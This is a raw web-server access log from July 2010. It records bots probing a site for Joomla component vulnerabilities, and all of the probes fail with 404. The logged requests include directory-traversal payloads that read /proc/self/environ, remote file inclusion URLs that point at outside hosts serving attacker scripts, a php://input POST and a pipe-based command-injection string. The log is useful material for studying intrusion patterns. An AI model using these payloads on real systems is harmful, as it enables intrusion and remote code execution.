91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:31 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:31 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:46 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:46 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
112.104.57.22 - - [26/Jul/2010:14:18:03 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:18:03 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:18:09 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
80.89.233.48 - - [26/Jul/2010:14:20:20 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:14:20:20 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:14:20:20 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
93.158.148.30 - - [26/Jul/2010:14:21:55 +0200] "GET /?C=S;O=A HTTP/1.1" 200 559 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
112.104.57.22 - - [26/Jul/2010:14:24:10 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:24:10 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:24:11 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:24:11 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:25:09 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:25:10 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:25:29 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:25:30 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:25:30 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:26:00 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:26:01 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:26:01 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:26:18 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:26:19 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:26:20 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
94.23.8.200 - - [26/Jul/2010:14:27:44 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:14:27:44 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.93.240.71 - - [26/Jul/2010:14:27:52 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
81.93.240.71 - - [26/Jul/2010:14:27:52 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
112.104.57.22 - - [26/Jul/2010:14:30:24 +0200] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.mymw.info//id.jpg? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:30:24 +0200] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.mymw.info//id.jpg? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:14:30:25 +0200] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.mymw.info//id.jpg? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
81.93.240.71 - - [26/Jul/2010:14:30:41 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
81.93.240.71 - - [26/Jul/2010:14:30:41 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
81.93.240.71 - - [26/Jul/2010:14:30:41 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
94.23.8.200 - - [26/Jul/2010:14:30:42 +0200] "GET /logs/access_log//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:14:30:42 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.8.200 - - [26/Jul/2010:14:30:43 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:14:35:41 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
80.89.233.48 - - [26/Jul/2010:14:38:11 +0200] "GET //index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:14:38:53 +0200] "GET /logs/access_log//index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:14:38:53 +0200] "GET //index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:14:38:53 +0200] "GET /logs//index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
67.195.112.178 - - [26/Jul/2010:14:48:09 +0200] "GET /?C=N;O=D HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
92.43.201.28 - - [26/Jul/2010:15:00:45 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:00:46 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:00:48 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:00:48 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
83.149.110.213 - - [26/Jul/2010:15:00:52 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:52 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:52 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:52 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:53 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:00:53 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:11 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:01:11 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
76.242.100.234 - - [26/Jul/2010:15:03:09 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:03:09 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:04:13 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:04:13 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:14:28 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:14:29 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
83.149.110.213 - - [26/Jul/2010:15:21:56 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:21:56 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:21:57 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:21:57 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:21:57 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:21:58 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:21:58 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:21:58 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
24.137.91.88 - - [26/Jul/2010:15:23:56 +0200] "GET / HTTP/1.1" 200 559 "http://www.designerlove.com/photoalbums.php?action=one&photoid=14753&id=3927" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
76.242.100.234 - - [26/Jul/2010:15:27:21 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:27:21 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
188.165.213.8 - - [26/Jul/2010:15:42:09 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:42:49 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:42:49 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
218.234.23.94 - - [26/Jul/2010:15:43:48 +0200] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:43:48 +0200] "GET /logs/access_log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:43:48 +0200] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:43:48 +0200] "GET /logs/error_log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 316 "-" "Mozilla/5.0"
66.45.240.106 - - [26/Jul/2010:15:44:33 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:15:44:33 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:15:44:33 +0200] "GET /index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
66.45.240.106 - - [26/Jul/2010:15:44:33 +0200] "POST /index.php?option=com_properties&controller=php://input HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
83.149.110.213 - - [26/Jul/2010:15:44:45 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:44:45 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:44:45 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:44:45 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:44:46 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:44:46 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.165.213.8 - - [26/Jul/2010:15:45:15 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:45:15 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:45:16 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
83.149.110.213 - - [26/Jul/2010:15:45:17 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:15:45:17 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:15:45:40 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:45:40 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
80.89.233.48 - - [26/Jul/2010:15:45:51 +0200] "GET //index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
211.202.2.34 - - [26/Jul/2010:15:46:00 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:46:00 +0200] "GET //index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:46:00 +0200] "GET /logs//index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:46:01 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:46:01 +0200] "GET /logs//index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:46:01 +0200] "GET //index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
92.43.201.28 - - [26/Jul/2010:15:46:09 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:15:46:10 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
188.165.213.8 - - [26/Jul/2010:15:46:53 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:47:26 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
114.108.151.149 - - [26/Jul/2010:15:48:34 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
80.89.233.48 - - [26/Jul/2010:15:49:01 +0200] "GET /logs/access_log//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:15:49:01 +0200] "GET //index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
80.89.233.48 - - [26/Jul/2010:15:49:01 +0200] "GET /logs//index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
218.234.23.94 - - [26/Jul/2010:15:49:12 +0200] "GET /sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:49:12 +0200] "GET /logs/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 306 "-" "Mozilla/5.0"
218.234.23.94 - - [26/Jul/2010:15:49:13 +0200] "GET /logs/access_log/sitemap.xml.php?mosConfig_absolute_path=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
211.202.2.34 - - [26/Jul/2010:15:51:42 +0200] "GET //index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:42 +0200] "GET /logs//index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:42 +0200] "GET /logs/access_log%20%20//index.php?option=com_g2bridge&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:43 +0200] "GET //index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:43 +0200] "GET /logs//index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:15:51:43 +0200] "GET /logs/access_log%20%20//index.php?option=com_g2bridge&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
188.165.213.8 - - [26/Jul/2010:15:52:29 +0200] "GET /logs/access_log///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:52:29 +0200] "GET ///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
188.165.213.8 - - [26/Jul/2010:15:52:29 +0200] "GET /logs///index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.803"
187.45.193.159 - - [26/Jul/2010:15:52:43 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:15:52:43 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:15:52:44 +0200] "GET /index.php?option=com_properties&controller=....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
187.45.193.159 - - [26/Jul/2010:15:52:44 +0200] "POST /index.php?option=com_properties&controller=php://input HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
114.108.151.149 - - [26/Jul/2010:15:53:34 +0200] "GET /logs/access_log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:15:53:34 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:15:53:35 +0200] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
76.242.100.234 - - [26/Jul/2010:15:55:31 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:55:31 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:15:55:42 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
